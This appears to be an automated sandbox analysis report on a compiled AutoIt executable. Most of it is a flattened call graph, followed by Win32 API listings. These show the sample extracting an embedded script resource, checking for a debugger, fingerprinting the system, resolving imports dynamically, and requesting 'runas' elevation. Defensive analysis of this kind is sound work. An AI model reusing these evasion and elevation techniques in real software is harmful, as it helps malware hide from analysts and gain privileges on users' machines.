98453b CloseHandle 94682->94684 94683->94682 94684->94346 94685->94312 94686->94312 94687->94323 94688->94330 94689->94338 94690->94344 94692 99f4ea 48 API calls 94691->94692 94693 99e64d 94692->94693 94694 986b4a 48 API calls 94693->94694 94695 99e55f 94694->94695 94696 98bf20 94695->94696 94713 98c1c2 94696->94713 94698 98bf31 94700 98bf66 94698->94700 94720 98c2e0 94698->94720 94726 98bf71 94698->94726 94700->94661 94702 98c1de MultiByteToWideChar 94700->94702 94703 98c201 94702->94703 94704 98c245 94702->94704 94705 99f4ea 48 API calls 94703->94705 94706 98bcce 48 API calls 94704->94706 94707 98c216 MultiByteToWideChar 94705->94707 94709 98c237 94706->94709 94741 98c24f 94707->94741 94709->94665 94710->94660 94711->94660 94712->94666 94714 9f3e49 94713->94714 94715 98c1d3 94713->94715 94716 986b4a 48 API calls 94714->94716 94715->94698 94717 9f3e53 94716->94717 94718 99f4ea 48 API calls 94717->94718 94719 9f3e5f 94718->94719 94721 98c354 94720->94721 94724 98c2ee 94720->94724 94735 9845a6 SetFilePointerEx 94721->94735 94723 98c317 94723->94698 94724->94723 94725 98c327 ReadFile 94724->94725 94725->94723 94725->94724 94727 9f3d35 94726->94727 94728 98bf85 94726->94728 94729 986b4a 48 API calls 94727->94729 94736 98c3b9 94728->94736 94731 9f3d40 94729->94731 94733 99f4ea 48 API calls 94731->94733 94732 98bf91 94732->94698 94734 9f3d55 ___crtGetEnvironmentStringsW 94733->94734 94735->94724 94737 98c3cf 94736->94737 94740 98c3ca ___crtGetEnvironmentStringsW 94736->94740 94738 9f3e67 94737->94738 94739 99f4ea 48 API calls 94737->94739 94739->94740 94740->94732 94742 98c25e 94741->94742 94743 98c2d1 94741->94743 94742->94743 94745 98c26a 94742->94745 94744 98b18b 48 API calls 94743->94744 94746 98c27c ___crtGetEnvironmentStringsW 94744->94746 94747 98c2a2 94745->94747 94748 98c274 94745->94748 94746->94709 94749 986b4a 48 API calls 94747->94749 94753 98c369 48 API calls 94748->94753 94751 98c2ac 94749->94751 94752 99f4ea 48 API calls 94751->94752 94752->94746 
94753->94746 94755 984818 CreateFileW 94754->94755 94756 9f406e 94754->94756 94758 984582 94755->94758 94757 9f4074 CreateFileW 94756->94757 94756->94758 94757->94758 94759 9f409a 94757->94759 94758->94678 94762 9845d5 94758->94762 94784 9846ce 94759->94784 94764 9845f5 94762->94764 94763 9846a2 94763->94674 94764->94763 94765 9846ce 2 API calls 94764->94765 94773 98464e 94764->94773 94766 98462d 94765->94766 94767 99f4ea 48 API calls 94766->94767 94768 984638 94767->94768 94769 9847b7 48 API calls 94768->94769 94771 984642 94769->94771 94770 9846ce 2 API calls 94770->94763 94772 98c2e0 2 API calls 94771->94772 94772->94773 94774 9846ce 2 API calls 94773->94774 94781 984689 94773->94781 94775 9f3e0a 94774->94775 94794 9835fe 94775->94794 94778 99f4ea 48 API calls 94779 9f3e19 94778->94779 94780 98c2e0 2 API calls 94779->94780 94780->94781 94781->94770 94782->94676 94783->94678 94791 9846e8 94784->94791 94785 98476d SetFilePointerEx 94792 984798 SetFilePointerEx 94785->94792 94786 9f40d0 94793 984798 SetFilePointerEx 94786->94793 94789 9f40ea 94790 984743 94790->94758 94791->94785 94791->94786 94791->94790 94792->94790 94793->94789 94795 9846ce 2 API calls 94794->94795 94796 98361f 94795->94796 94797 9846ce 2 API calls 94796->94797 94798 983633 94797->94798 94798->94778 94799->94355 94809 9a1e46 94800->94809 94803->94384 94804->94391 94805->94381 94806->94361 94807->94390 94808->94390 94810 9a1e55 94809->94810 94811 9a1e61 94809->94811 94810->94811 94823 9a1ed4 94810->94823 94828 9a9d6b 47 API calls __strnicmp_l 94810->94828 94833 9a7c0e 47 API calls __getptd_noexit 94811->94833 94813 9a2019 94817 9a1e41 94813->94817 94834 9a6e10 8 API calls __strnicmp_l 94813->94834 94816 9a1fa0 94816->94811 94816->94817 94819 9a1fb0 94816->94819 94817->94367 94818 9a1f5f 94818->94811 94820 9a1f7b 94818->94820 94830 9a9d6b 47 API calls __strnicmp_l 94818->94830 94832 9a9d6b 47 API calls __strnicmp_l 94819->94832 94820->94811 94820->94817 94822 9a1f91 94820->94822 94831 9a9d6b 47 
API calls __strnicmp_l 94822->94831 94823->94811 94827 9a1f41 94823->94827 94829 9a9d6b 47 API calls __strnicmp_l 94823->94829 94827->94816 94827->94818 94828->94823 94829->94827 94830->94820 94831->94817 94832->94817 94833->94813 94834->94817 94836 98d654 94835->94836 94843 98d67e 94835->94843 94837 98d65b 94836->94837 94839 98d6c2 94836->94839 94838 98d666 94837->94838 94844 98d6ab 94837->94844 94860 98d9a0 53 API calls __cinit 94838->94860 94839->94844 94862 99dce0 53 API calls 94839->94862 94843->94410 94844->94843 94861 99dce0 53 API calls 94844->94861 94863 986b0f 94845->94863 94847 99d947 _wcscmp 94848 9fabcf 94847->94848 94849 98ce19 48 API calls 94847->94849 94851 99d975 Mailbox 94847->94851 94868 98510d 48 API calls Mailbox 94848->94868 94849->94848 94851->94410 94852 9fabdd 94853 98d645 53 API calls 94852->94853 94854 9fabef 94853->94854 94856 9fabf4 Mailbox 94854->94856 94869 98dcae 50 API calls Mailbox 94854->94869 94856->94410 94857->94416 94858->94416 94859->94402 94860->94843 94861->94843 94862->94844 94864 99f4ea 48 API calls 94863->94864 94865 986b34 94864->94865 94866 986b4a 48 API calls 94865->94866 94867 986b43 94866->94867 94867->94847 94868->94852 94869->94856 94870->94469 94871->94435 94872->94444 94874 99479f 94873->94874 94875 994637 94873->94875 94878 98ce19 48 API calls 94874->94878 94876 9f6e05 94875->94876 94877 994643 94875->94877 94879 9de822 335 API calls 94876->94879 94897 994300 94877->94897 94885 9946e4 Mailbox 94878->94885 94881 9f6e11 94879->94881 94882 994739 Mailbox 94881->94882 94971 9ccc5c 86 API calls 4 library calls 94881->94971 94882->94469 94884 994659 94884->94881 94884->94882 94884->94885 94912 9cfa0c 94885->94912 94953 9d6ff0 94885->94953 94962 984252 94885->94962 94968 9c6524 94885->94968 94890->94446 94891->94451 94892->94469 94893->94461 94894->94463 94895->94467 94896->94469 94898 9f6e60 94897->94898 94901 99432c 94897->94901 94973 9ccc5c 86 API calls 4 library calls 94898->94973 94900 9f6e71 94974 9ccc5c 86 API 
calls 4 library calls 94900->94974 94901->94900 94907 994366 ___crtGetEnvironmentStringsW 94901->94907 94903 994445 94903->94884 94905 99f4ea 48 API calls 94905->94907 94906 9944b1 94906->94884 94907->94903 94907->94905 94908 98fe30 335 API calls 94907->94908 94909 9f6ebd 94907->94909 94911 994435 94907->94911 94908->94907 94975 9ccc5c 86 API calls 4 library calls 94909->94975 94911->94903 94972 9dcda2 82 API calls Mailbox 94911->94972 94913 9cfa1c __ftell_nolock 94912->94913 94914 9cfa44 94913->94914 95061 98d286 48 API calls 94913->95061 94916 98936c 81 API calls 94914->94916 94917 9cfa5e 94916->94917 94918 9cfb68 94917->94918 94919 9cfa80 94917->94919 94930 9cfb92 94917->94930 94976 9841a9 94918->94976 94921 98936c 81 API calls 94919->94921 94927 9cfa8c _wcscpy _wcschr 94921->94927 94923 9cfb8e 94925 98936c 81 API calls 94923->94925 94923->94930 94924 9841a9 136 API calls 94924->94923 94926 9cfbc7 94925->94926 94928 9a1dfc __wsplitpath 47 API calls 94926->94928 94932 9cfab0 _wcscat _wcscpy 94927->94932 94936 9cfade _wcscat 94927->94936 94937 9cfbeb _wcscat _wcscpy 94928->94937 94929 98936c 81 API calls 94931 9cfafc _wcscpy 94929->94931 94930->94882 95062 9c72cb GetFileAttributesW 94931->95062 94934 98936c 81 API calls 94932->94934 94934->94936 94935 9cfb1c __wsetenvp 94935->94930 94938 98936c 81 API calls 94935->94938 94936->94929 94941 98936c 81 API calls 94937->94941 94939 9cfb48 94938->94939 95063 9c60dd 77 API calls 4 library calls 94939->95063 94943 9cfc82 94941->94943 94942 9cfb5c 94942->94930 95000 9c690b 94943->95000 94945 9cfca2 94946 9c6524 3 API calls 94945->94946 94947 9cfcb1 94946->94947 94948 98936c 81 API calls 94947->94948 94951 9cfce2 94947->94951 94949 9cfccb 94948->94949 95006 9cbfa4 94949->95006 94952 984252 84 API calls 94951->94952 94952->94930 94954 98936c 81 API calls 94953->94954 94955 9d702a 94954->94955 95980 98b470 94955->95980 94957 9d703a 94958 9d705f 94957->94958 94959 98fe30 335 API calls 94957->94959 94960 98cdb9 48 API calls 
94958->94960 94961 9d7063 94958->94961 94959->94958 94960->94961 94961->94882 94963 98425c 94962->94963 94967 984263 94962->94967 94964 9a35e4 __fcloseall 83 API calls 94963->94964 94964->94967 94965 984272 94965->94882 94966 984283 FreeLibrary 94966->94965 94967->94965 94967->94966 96017 9c6ca9 GetFileAttributesW 94968->96017 94971->94882 94972->94906 94973->94900 94974->94903 94975->94903 95064 984214 94976->95064 94981 9f4f73 94983 984252 84 API calls 94981->94983 94982 9841d4 LoadLibraryExW 95074 984291 94982->95074 94985 9f4f7a 94983->94985 94987 984291 3 API calls 94985->94987 94989 9f4f82 94987->94989 95100 9844ed 94989->95100 94990 9841fb 94990->94989 94991 984207 94990->94991 94993 984252 84 API calls 94991->94993 94994 98420c 94993->94994 94994->94923 94994->94924 94997 9f4fa9 95108 984950 94997->95108 95001 9c6918 _wcschr __ftell_nolock 95000->95001 95002 9c692e _wcscat _wcscpy 95001->95002 95003 9a1dfc __wsplitpath 47 API calls 95001->95003 95002->94945 95004 9c695d 95003->95004 95005 9a1dfc __wsplitpath 47 API calls 95004->95005 95005->95002 95007 9cbfb1 __ftell_nolock 95006->95007 95008 99f4ea 48 API calls 95007->95008 95009 9cc00e 95008->95009 95010 9847b7 48 API calls 95009->95010 95011 9cc018 95010->95011 95012 9cbdb4 GetSystemTimeAsFileTime 95011->95012 95013 9cc023 95012->95013 95014 984517 83 API calls 95013->95014 95015 9cc036 _wcscmp 95014->95015 95016 9cc05a 95015->95016 95017 9cc107 95015->95017 95616 9cc56d 95016->95616 95019 9cc56d 94 API calls 95017->95019 95035 9cc0d3 _wcscat 95019->95035 95021 9a1dfc __wsplitpath 47 API calls 95026 9cc088 _wcscat _wcscpy 95021->95026 95022 9844ed 64 API calls 95024 9cc12c 95022->95024 95023 9cc110 95023->94951 95025 9844ed 64 API calls 95024->95025 95027 9cc13c 95025->95027 95029 9a1dfc __wsplitpath 47 API calls 95026->95029 95028 9844ed 64 API calls 95027->95028 95030 9cc157 95028->95030 95029->95035 95031 9844ed 64 API calls 95030->95031 95032 9cc167 95031->95032 95033 9844ed 64 API calls 95032->95033 
95034 9cc182 95033->95034 95036 9844ed 64 API calls 95034->95036 95035->95022 95035->95023 95037 9cc192 95036->95037 95038 9844ed 64 API calls 95037->95038 95039 9cc1a2 95038->95039 95040 9844ed 64 API calls 95039->95040 95041 9cc1b2 95040->95041 95586 9cc71a GetTempPathW GetTempFileNameW 95041->95586 95043 9cc1be 95044 9a3499 117 API calls 95043->95044 95055 9cc1cf 95044->95055 95045 9cc289 95600 9a35e4 95045->95600 95047 9cc294 95049 9cc2ae 95047->95049 95050 9cc29a DeleteFileW 95047->95050 95048 9844ed 64 API calls 95048->95055 95051 9cc342 CopyFileW 95049->95051 95056 9cc2b8 95049->95056 95050->95023 95052 9cc358 DeleteFileW 95051->95052 95053 9cc36a DeleteFileW 95051->95053 95052->95023 95613 9cc6d9 CreateFileW 95053->95613 95055->95023 95055->95045 95055->95048 95587 9a2aae 95055->95587 95622 9cb965 95056->95622 95060 9cc331 DeleteFileW 95060->95023 95061->94914 95062->94935 95063->94942 95113 984339 95064->95113 95067 98423c 95069 9841bb 95067->95069 95070 984244 FreeLibrary 95067->95070 95071 9a3499 95069->95071 95070->95069 95121 9a34ae 95071->95121 95073 9841c8 95073->94981 95073->94982 95324 9842e4 95074->95324 95077 9842b8 95079 9841ec 95077->95079 95080 9842c1 FreeLibrary 95077->95080 95081 984380 95079->95081 95080->95079 95082 99f4ea 48 API calls 95081->95082 95083 984395 95082->95083 95084 9847b7 48 API calls 95083->95084 95085 9843a1 ___crtGetEnvironmentStringsW 95084->95085 95086 9843dc 95085->95086 95087 984499 95085->95087 95088 9844d1 95085->95088 95089 984950 57 API calls 95086->95089 95332 98406b CreateStreamOnHGlobal 95087->95332 95343 9cc750 93 API calls 95088->95343 95092 9843e5 95089->95092 95093 9844ed 64 API calls 95092->95093 95094 984479 95092->95094 95096 9f4ed7 95092->95096 95338 984517 95092->95338 95093->95092 95094->94990 95097 984517 83 API calls 95096->95097 95098 9f4eeb 95097->95098 95099 9844ed 64 API calls 95098->95099 95099->95094 95101 9844ff 95100->95101 95104 9f4fc0 95100->95104 95367 9a381e 95101->95367 95105 9cbf5a 
95563 9cbdb4 95105->95563 95107 9cbf70 95107->94997 95109 98495f 95108->95109 95110 9f5002 95108->95110 95568 9a3e65 95109->95568 95112 984967 95117 98434b 95113->95117 95116 984321 LoadLibraryA GetProcAddress 95116->95067 95118 98422f 95117->95118 95119 984354 LoadLibraryA 95117->95119 95118->95067 95118->95116 95119->95118 95120 984365 GetProcAddress 95119->95120 95120->95118 95122 9a34ba _doexit 95121->95122 95123 9a34cd 95122->95123 95125 9a34fe 95122->95125 95169 9a7c0e 47 API calls __getptd_noexit 95123->95169 95140 9ae4c8 95125->95140 95126 9a34d2 95170 9a6e10 8 API calls __strnicmp_l 95126->95170 95129 9a3503 95130 9a3519 95129->95130 95131 9a350c 95129->95131 95133 9a3543 95130->95133 95134 9a3523 95130->95134 95171 9a7c0e 47 API calls __getptd_noexit 95131->95171 95154 9ae5e0 95133->95154 95172 9a7c0e 47 API calls __getptd_noexit 95134->95172 95135 9a34dd _doexit @_EH4_CallFilterFunc@8 95135->95073 95141 9ae4d4 _doexit 95140->95141 95174 9a7cf4 95141->95174 95143 9ae4e2 95144 9ae559 95143->95144 95152 9ae552 95143->95152 95184 9a7d7c 95143->95184 95207 9a4e5b 48 API calls __lock 95143->95207 95208 9a4ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 95143->95208 95209 9a69d0 95144->95209 95148 9ae56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 95148->95152 95149 9ae5cc _doexit 95149->95129 95181 9ae5d7 95152->95181 95162 9ae600 __wopenfile 95154->95162 95155 9ae61a 95232 9a7c0e 47 API calls __getptd_noexit 95155->95232 95157 9ae61f 95233 9a6e10 8 API calls __strnicmp_l 95157->95233 95159 9ae838 95229 9b63c9 95159->95229 95160 9a354e 95173 9a3570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 95160->95173 95162->95155 95168 9ae7d5 95162->95168 95234 9a185b 59 API calls 2 library calls 95162->95234 95164 9ae7ce 95164->95168 95235 9a185b 59 API calls 2 library calls 95164->95235 95166 9ae7ed 95166->95168 95236 9a185b 59 API calls 2 library calls 95166->95236 95168->95155 95168->95159 95169->95126 95170->95135 95171->95135 
95172->95135 95173->95135 95175 9a7d18 RtlEnterCriticalSection 95174->95175 95176 9a7d05 95174->95176 95175->95143 95177 9a7d7c __mtinitlocknum 46 API calls 95176->95177 95178 9a7d0b 95177->95178 95178->95175 95215 9a115b 47 API calls 3 library calls 95178->95215 95216 9a7e58 RtlLeaveCriticalSection 95181->95216 95183 9ae5de 95183->95149 95185 9a7d88 _doexit 95184->95185 95186 9a7da9 95185->95186 95187 9a7d91 95185->95187 95189 9a69d0 __malloc_crt 46 API calls 95186->95189 95199 9a7dc9 _doexit 95186->95199 95217 9a81c2 47 API calls 2 library calls 95187->95217 95191 9a7dbd 95189->95191 95190 9a7d96 95218 9a821f 47 API calls 8 library calls 95190->95218 95193 9a7dd3 95191->95193 95194 9a7dc4 95191->95194 95197 9a7cf4 __lock 46 API calls 95193->95197 95220 9a7c0e 47 API calls __getptd_noexit 95194->95220 95195 9a7d9d 95219 9a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 95195->95219 95200 9a7dda 95197->95200 95199->95143 95202 9a7de9 InitializeCriticalSectionAndSpinCount 95200->95202 95203 9a7dfe 95200->95203 95204 9a7e04 95202->95204 95221 9a1c9d 95203->95221 95227 9a7e1a RtlLeaveCriticalSection _doexit 95204->95227 95207->95143 95208->95143 95211 9a69de 95209->95211 95210 9a395c __crtGetStringTypeA_stat 46 API calls 95210->95211 95211->95210 95212 9a6a12 95211->95212 95213 9a69f1 Sleep 95211->95213 95212->95148 95212->95152 95214 9a6a0a 95213->95214 95214->95211 95214->95212 95216->95183 95217->95190 95218->95195 95220->95199 95222 9a1ccf _free 95221->95222 95223 9a1ca6 RtlFreeHeap 95221->95223 95222->95204 95223->95222 95224 9a1cbb 95223->95224 95228 9a7c0e 47 API calls __getptd_noexit 95224->95228 95226 9a1cc1 GetLastError 95226->95222 95227->95199 95228->95226 95237 9b5bb1 95229->95237 95231 9b63e2 95231->95160 95232->95157 95233->95160 95234->95164 95235->95166 95236->95168 95238 9b5bbd _doexit 95237->95238 95239 9b5bcf 95238->95239 95242 9b5c06 95238->95242 95321 9a7c0e 47 API calls __getptd_noexit 95239->95321 95241 9b5bd4 95322 
Execution Graph (flattened node/edge listing from the interactive call-graph widget; node IDs, edge arrows and unresolved call-site addresses carry no standalone information and are omitted here).

Recoverable content: the graph is dominated by C runtime internals (__wsopen_helper, __lseeki64, __lseeki64_nolock, __close_nolock, __flush, __filbuf, __fread_nolock, __ftell_nolock, __lock_file, __lock_fhandle, __getptd_noexit, __malloc_crt, __calloc_crt, _free, _doexit, __invoke_watson, __RTC_Initialize, __wwincmdln, _wparse_cmdline, __wsetenvp, __cinit) that wrap Win32 file, heap, console and startup calls (CreateFileW, GetFileType, ReadFile, ReadConsoleW, GetConsoleMode, CloseHandle, SetFileTime, FindFirstFileW/FindClose, GetStdHandle, GetProcessHeap, RtlAllocateHeap, GetCommandLineW, GetEnvironmentStringsW/FreeEnvironmentStringsW, GetModuleFileNameW, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection/RtlLeaveCriticalSection, TlsAlloc/TlsSetValue, GetCurrentThreadId, MultiByteToWideChar, GetSystemTimeAsFileTime, GetLastError, Sleep).

Win32 calls of analytic interest reached from the graph:
- dynamic import resolution through LoadLibraryA followed by GetProcAddress, at several sites, including one pair that also calls FreeLibrary;
- IsDebuggerPresent, once inside the CRT security-failure path (SetUnhandledExceptionFilter/UnhandledExceptionFilter, then GetCurrentProcess and TerminateProcess) and once in application code on a path that leads to MessageBoxA;
- environment fingerprinting via GetVersionExW, GetSystemInfo, GetNativeSystemInfo and IsProcessorFeaturePresent;
- registry reads via RegOpenKeyExW, RegQueryValueExW and RegCloseKey;
- embedded resource access via FindResourceExW, LoadResource, SizeofResource and LockResource;
- CoInitialize, CreateThread, GetCurrentDirectoryW/SetCurrentDirectoryW, CharUpperBuffW and InterlockedDecrement;
- GUI and tray-icon activity via Shell_NotifyIconW, CreatePopupMenu, SetTimer/KillTimer, RegisterClipboardFormatW, SystemParametersInfoW, PostQuitMessage, SetFocus, MoveWindow, DeleteObject/DestroyWindow and NtdllDefWindowProc_W.

                                    Control-flow Graph
                                    • Graph (rendered figure not preserved): basic blocks 9ab043 to 9ab86c calling GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile and GetLastError
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                    • Instruction ID: 3ca2b0ba836b11f5787cb1279356e3110861f6ada2f8aa8387a57d12d48fe2e3
                                    • Opcode Fuzzy Hash: 57a51958d74929b9b993abf0328b1fcdc932b73c23905ac9a39d3d6c719ccb96
                                    • Instruction Fuzzy Hash: D0324F75B022288BDB24CF58DC416E9B7B9FB4B314F1841D9E40AA7A52D7349E81CF92

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00983AA3,?), ref: 00983D45
                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00983AA3,?), ref: 00983D57
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A41148,00A41130,?,?,?,?,00983AA3,?), ref: 00983DC8
                                      • Part of subcall function 00986430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983DEE,00A41148,?,?,?,?,?,00983AA3,?), ref: 00986471
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00983AA3,?), ref: 00983E48
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A328F4,00000010), ref: 009F1CCE
                                    • SetCurrentDirectoryW.KERNEL32(?,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D06
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A1DAB4,00A41148,?,?,?,?,?,00983AA3,?), ref: 009F1D89
                                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00983AA3), ref: 009F1D90
                                      • Part of subcall function 00983E6E: GetSysColorBrush.USER32(0000000F), ref: 00983E79
                                      • Part of subcall function 00983E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00983E88
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(00000063), ref: 00983E9E
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(000000A4), ref: 00983EB0
                                      • Part of subcall function 00983E6E: LoadIconW.USER32(000000A2), ref: 00983EC2
                                      • Part of subcall function 00983E6E: RegisterClassExW.USER32(?), ref: 00983F30
                                      • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 009836E6
                                      • Part of subcall function 009836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983707
                                      • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 0098371B
                                      • Part of subcall function 009836B8: ShowWindow.USER32(00000000,?,?,?,?,00983AA3,?), ref: 00983724
                                      • Part of subcall function 00984FFC: _memset.LIBCMT ref: 00985022
                                      • Part of subcall function 00984FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009850CB
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 009F1CC8
                                    • runas, xrefs: 009F1D84
                                    Similarity
                                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 438480954-3287110873
                                    • Opcode ID: 86e8a5019732dca6a3eb1a22542e7022cb4b0a0e517d5c4fdcb7ebd9e47b6c14
                                    • Instruction ID: 096e58533d10d55ff2e4b97846c00ab6f250efa26f91c305b043d01be4ddb281
                                    • Opcode Fuzzy Hash: 86e8a5019732dca6a3eb1a22542e7022cb4b0a0e517d5c4fdcb7ebd9e47b6c14
                                    • Instruction Fuzzy Hash: FC510539A44248BBCB11FBF8DC45FED7B79AFC6B00F008169F21166292DB754686CB21

                                    Control-flow Graph
                                    • Graph (rendered figure not preserved): basic blocks 983742 to 9f1ea2 calling NtdllDefWindowProc_W, PostQuitMessage, SetTimer, RegisterClipboardFormatW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus
                                    APIs
                                    • NtdllDefWindowProc_W.USER32(?,?,?,?), ref: 009837B3
                                    • KillTimer.USER32(?,00000001), ref: 009837DD
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983800
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0098380B
                                    • CreatePopupMenu.USER32 ref: 0098381F
                                    • PostQuitMessage.USER32(00000000), ref: 0098382E
                                    Similarity
                                    • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                    • String ID: TaskbarCreated
                                    • API String ID: 157504867-2362178303
                                    • Opcode ID: ef36ba5c0971d640ac3ba725e52145ed5ee3f3477fa5b2e302c9342404b49082
                                    • Instruction ID: 4b21c289fb60767d3d8893e6c6a78609f198a5921c8b2e04e643a71ef0b5d33c
                                    • Opcode Fuzzy Hash: ef36ba5c0971d640ac3ba725e52145ed5ee3f3477fa5b2e302c9342404b49082
                                    • Instruction Fuzzy Hash: 0F415DFA114249E7DB14FFA8EC4AF793A59F7C1B00F008515F602D2391DB69DD928761

                                    Control-flow Graph
                                    • Graph (rendered figure not preserved): basic blocks 99ddc0 to 9f24f8 calling GetVersionExW, GetCurrentProcess, GetNativeSystemInfo, GetSystemInfo and FreeLibrary
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0099DDEC
                                    • GetCurrentProcess.KERNEL32(00000000,00A1DC38,?,?), ref: 0099DEAC
                                    • GetNativeSystemInfo.KERNELBASE(?,00A1DC38,?,?), ref: 0099DF01
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF0C
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0099DF1F
                                    • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF29
                                    • GetSystemInfo.KERNEL32(?,00A1DC38,?,?), ref: 0099DF35
                                    Similarity
                                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                    • String ID:
                                    • API String ID: 3851250370-0
                                    • Opcode ID: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                    • Instruction ID: a466e65408f8131aa8b927271b4ddcf02acd35d0042e1b3aafd9a8d264f2e13d
                                    • Opcode Fuzzy Hash: 4b84ad5403354b707c038852881853740771f16003e24b0e221b74f95e6e6340
                                    • Instruction Fuzzy Hash: B761C4B180A388DFCF15CFA898C12EDBFB86F69300B1949D9D8459F247C674C909CB65

                                    Control-flow Graph
                                    • Graph (rendered figure not preserved): basic blocks 98406b to 9f4f6e calling CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0098449E,?,?,00000000,00000001), ref: 0098407B
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0098449E,?,?,00000000,00000001), ref: 00984092
                                    • LoadResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F1A
                                    • SizeofResource.KERNEL32(?,00000000,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB), ref: 009F4F2F
                                    • LockResource.KERNEL32(0098449E,?,?,0098449E,?,?,00000000,00000001,?,?,?,?,?,?,009841FB,00000000), ref: 009F4F42
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                    • Instruction ID: af0f14ed296a4577cbdafe69b1ce330bddeebf9f221bcb8657fd5c1eac2073ce
                                    • Opcode Fuzzy Hash: 1b467a9c4092565056fabd2c1ff490bcd64d393878be4fb2e93988ec0e8fe7ef
                                    • Instruction Fuzzy Hash: 49111871200705BFE7219BA5EC48F677BBDEFC9B51F10856CB602962A0DA61DC028A20
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,009F2F49), ref: 009C6CB9
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 009C6CCA
                                    • FindClose.KERNEL32(00000000), ref: 009C6CDA
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                    • Instruction ID: 0fc9a51198656abdd5c447e36c9af889ebc1a57deb83fa0739a7663af89a0024
                                    • Opcode Fuzzy Hash: d0ce5754ba64837a593b57bda6ded81986b4d5dddd0d6a068782368dea5d4b34
                                    • Instruction Fuzzy Hash: 33E0D832C1041457C210A7B8EC0D8EA376CDE05339F100709F5F1C11D0EB74D91145D6
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098E959
                                    • timeGetTime.WINMM ref: 0098EBFA
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0098ED2E
                                    • TranslateMessage.USER32(?), ref: 0098ED3F
                                    • DispatchMessageW.USER32(?), ref: 0098ED4A
                                    • LockWindowUpdate.USER32(00000000), ref: 0098ED79
                                    • DestroyWindow.USER32 ref: 0098ED85
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0098ED9F
                                    • Sleep.KERNEL32(0000000A), ref: 009F5270
                                    • TranslateMessage.USER32(?), ref: 009F59F7
                                    • DispatchMessageW.USER32(?), ref: 009F5A05
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009F5A19
                                    Similarity
                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
